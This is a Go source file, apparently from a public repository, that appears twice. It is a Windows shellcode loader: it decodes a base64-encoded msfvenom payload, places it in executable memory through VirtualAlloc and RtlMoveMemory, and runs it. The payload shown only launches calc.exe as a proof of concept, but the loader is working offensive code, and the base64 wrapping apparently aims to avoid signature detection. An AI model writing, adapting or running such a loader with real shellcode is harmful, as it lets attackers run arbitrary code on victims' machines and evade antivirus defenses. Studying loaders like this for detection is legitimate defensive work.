thatskriptkid/loader.go

## loader.go
package main

import (
	"syscall"
	b64 "encoding/base64"
	"unsafe"
)

const (
	MEM_COMMIT        = 0x00001000
	MEM_RESERVE       = 0x00002000
	PAGE_EXECUTE_READWRITE = 0x40
)

func main() {

	kernel32, err := syscall.LoadDLL("kernel32.dll")
	if err != nil {
		panic(err)
	}
	ntdll, err := syscall.LoadDLL("ntdll.dll")
	if err != nil {
		panic(err)
	}

	VirtualAlloc, err := kernel32.FindProc("VirtualAlloc")
	if err != nil || VirtualAlloc == nil {
		panic(err)
	}
	RtlMoveMemory, err := ntdll.FindProc("RtlMoveMemory")
	if err != nil || RtlMoveMemory == nil {
		panic(err)
	}

	//msfvenom -a x64 -p windows/x64/exec CMD=calc.exe -f hex
	// clean
	//sc := "fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500"

	// b64
	sc := "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"

	scb, err := b64.StdEncoding.DecodeString(sc)
	if err != nil {
		panic(err)
	}

	addr, _, _ := VirtualAlloc.Call(
		uintptr(0),
		uintptr(len(scb)),
		MEM_COMMIT|MEM_RESERVE,
		PAGE_EXECUTE_READWRITE)

	RtlMoveMemory.Call(
		addr,
		(uintptr)(unsafe.Pointer(&scb[0])),
		uintptr(len(scb)))


	syscall.Syscall(addr, 0, 0, 0, 0)
}
	package main

	import (
	"syscall"
	b64 "encoding/base64"
	"unsafe"
	)

	const (
	MEM_COMMIT = 0x00001000
	MEM_RESERVE = 0x00002000
	PAGE_EXECUTE_READWRITE = 0x40
	)

	func main() {

	kernel32, err := syscall.LoadDLL("kernel32.dll")
	if err != nil {
	panic(err)
	}
	ntdll, err := syscall.LoadDLL("ntdll.dll")
	if err != nil {
	panic(err)
	}

	VirtualAlloc, err := kernel32.FindProc("VirtualAlloc")
	if err != nil \|\| VirtualAlloc == nil {
	panic(err)
	}
	RtlMoveMemory, err := ntdll.FindProc("RtlMoveMemory")
	if err != nil \|\| RtlMoveMemory == nil {
	panic(err)
	}

	//msfvenom -a x64 -p windows/x64/exec CMD=calc.exe -f hex
	// clean
	//sc := "fc4883e4f0e8c0000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d08b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e957ffffff5d48ba0100000000000000488d8d0101000041ba318b6f87ffd5bbf0b5a25641baa695bd9dffd54883c4283c067c0a80fbe07505bb4713726f6a00594189daffd563616c632e65786500"

	// b64
	sc := "/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA"

	scb, err := b64.StdEncoding.DecodeString(sc)
	if err != nil {
	panic(err)
	}

	addr, _, _ := VirtualAlloc.Call(
	uintptr(0),
	uintptr(len(scb)),
	MEM_COMMIT\|MEM_RESERVE,
	PAGE_EXECUTE_READWRITE)

	RtlMoveMemory.Call(
	addr,
	(uintptr)(unsafe.Pointer(&scb[0])),
	uintptr(len(scb)))


	syscall.Syscall(addr, 0, 0, 0, 0)
	}